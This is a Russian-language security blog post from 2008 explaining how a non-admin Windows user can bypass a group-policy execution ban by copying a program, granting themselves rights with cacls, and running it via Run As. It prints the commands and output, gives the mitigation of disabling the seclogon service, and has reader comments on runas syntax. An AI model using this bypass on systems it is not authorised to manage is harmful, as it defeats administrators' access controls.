| RSS



Меню

Bookmark and Share


Календарь
«  Март 2008  »
Пн Вт Ср Чт Пт Сб Вс
     12
3456789
10111213141516
17181920212223
24252627282930
31

Статистика
Ваш IP: 216.73.217.117
Вы используете: v





Сейчас на сайте:

Тех поддержка ->

Облако тэгов
Брутер для мыла ОС написать свою операционную систему видио сайта Tor сторона Обратная бочками антенна Файлики НаХ php эксплоит Windows Server 2008 QIP Virtual sysctl proc Tune kernel freeBSD bridge Raid Bluetooth GEO game emulator Shell Python Open vSwitch армия червь Conficker вирус троян лаборатория касперского пиратство Apple iPhone Microsoft twitter социальная сеть анонимность лицензия Open Source уязвимость MySQL база данных Закон Франция Пират Skype мобильный хакер trend micro кибератака Германия робот Персональные данные Ноутбук Интернет китай цензура windows vista acer Linux патент браузер Firefox Internet Explorer Opera Safari Intel цахал Oracle патч Банкомат IBM США Dell Ford контроль кибербезопасность приговор Mozilla Chrome безопасность Госдума СМИ Windows 8 взлом Пентагон Украина Facebook Cisco Cloud Windows XP нетбук торрент музыка Биометрический Nokia Password ФБР IP-адрес sms RSA java флешки Google Captcha Symantec Спам Антивирус тест Anti-Malware Windows 7 операционная система windows провайдер tele2 авторское право rapidshare UNIX свиной грипп шантаж Дети копирайт McAfee HTTPS администратор icann студент Норвегия New York Times YouTube Warner Music КНДР Ubuntu AMD касперский Россия РФ сервер хостинг Принтер Wi-Fi суд пароль блог фишинг одноклассники Медведев контрафакт мошенник sony Gps по JavaScript Хакеры Yahoo фас компьютер софт Минкомсвязи Сбой мошенничество Доктор ВЕб Вконтакте ie8 исходный код МВД фильтр порнография Outlook свобода слова казахстан Autodesk сисадмин Gmail кредитная карта LiveJournal шифрование банк HTML5 Нанотехнологии wikipedia выборы DNS Android атака Mac OS X домен ФСБ прокуратура уголовное дело ICQ Singularity Sophos ошибка DARPA военные сайт Либрусек турция конференция спамер Полиция Koobface Великобритания IRC белоруссия Грузия Европа Linux Mint Билл Гейтс спецслужбы Royal Bank of Scotland смартфон vodafone F-Secure Symbian фильм ГАИ инновации Ватикан Новая Зеландия Adobe Австралия IDC Internet Explorer 9 iPad должник Ирландия поиск МТС Реклама слежка испания BSD Zeus личные данные eset защита Defcon виртуализация OpenOffice.org Черный список BlackBerry льготы индия Москва DVD Голосование социальные сети flash player paypal BitDefender Winamp сертификат Молдавия honda Anonymous WebM технологии Чипы техника Ассанж передача данных Оптоволокно пошлина Сколково арест Siemens Samsung Иск конкуренция учетная запись разработка XBOX LIVE вебинар исследование Санкт-Петербург McDonald's SOPA PIPA Megaupload CES Мобильный телефон беспилотник отчет приложение Иран Инвестиции платформа логотип роскомнадзор Контент Устройство сотрудничество

Главная » 2008 » Март » 9 » Повышение привилегий через Secondary Login Service в Windows
00:07
Повышение привилегий через Secondary Login Service в Windows
Пользователь, работающий с Secondary Login Service (Run As) может повысить свои привилегии. Если доступ к программе запрещен через групповую политику, просто скопируй его в любое место куда разрешена запись и сделай Run As от своего имени - он запустится. Дело в том, что при копировании права на файл меняются - ведь копирующий получает права создателя/владельца. Пример (пользователь test не админ):

cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE

BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER

BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R

C:\noexec>notepad.exe
Access denided.

C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F

C:\noexec>notepad.exe

Выход - выключить Secondary Logon:

sc stop seclogon
sc config seclogon start= disabled




Категория: | Просмотров: 2992 | Добавил: aka_kludge | Теги: | Рейтинг: 0.0/0
Всего комментариев: 2

1 kriol пишет:

(12.04.2010 13:01)

а что такое Secondary Login Service?

0




2 aka_kludge пишет:

(12.04.2010 21:10)

Цитата (kriol) а что такое Secondary Login Service?

это RUNAS - или выполнение комманды от имени пользователя:
СИНТАКСИС ....

RUNAS [ [/noprofile | /profile] [/env] [/netonly] ] /user:<имя пользователя> <программа>

RUNAS [ [/noprofile | /profile] [/env] [/netonly] ] /smartcard [/user:<имя пользователя>] <программа>

/noprofile Не загружать профиль пользователя. Это приводит к более
быстрой загрузке приложения, но может стать причиной
неправильной работы некоторых приложений.
/profile Загружать профиль пользователя.
Этот параметр установлен по умолчанию.
/env Использовать текущие параметры среды.
/netonly Учетные данные предназначены только для удаленного
доступа.
/savecred Использовать учетные данные, сохраненные пользователем.
Этот параметр не доступен в Windows XP Home Edition
и будет проигнорирован.
/smartcard Для указания учетных данных используется
смарт-карта.
/user <имя пользователя> должно быть в виде USER@DOMAIN или DOMAIN\USER
<программа> Командная строка для EXE. См. примеры ниже.

Примеры:
> runas /profile /user:mymachine\administrator cmd
> runas /profile /env /user:mydomain\admin "mmc %windir%\system32\dsa.msc"
> runas /env /user:user@domain.microsoft.com "notepad \"Мой файл.txt\""

Примечание: вводите пароль пользователя только тогда, когда он запрашивается.
Примечание: формат записи USER@DOMAIN несовместим с параметром /netonly.
Примечание: параметр /profile несовместим с параметром /netonly.

0



Главная
...
На службе : дней

11:52
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск

Архив записей


Copyright tHR - TeAM 2026 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика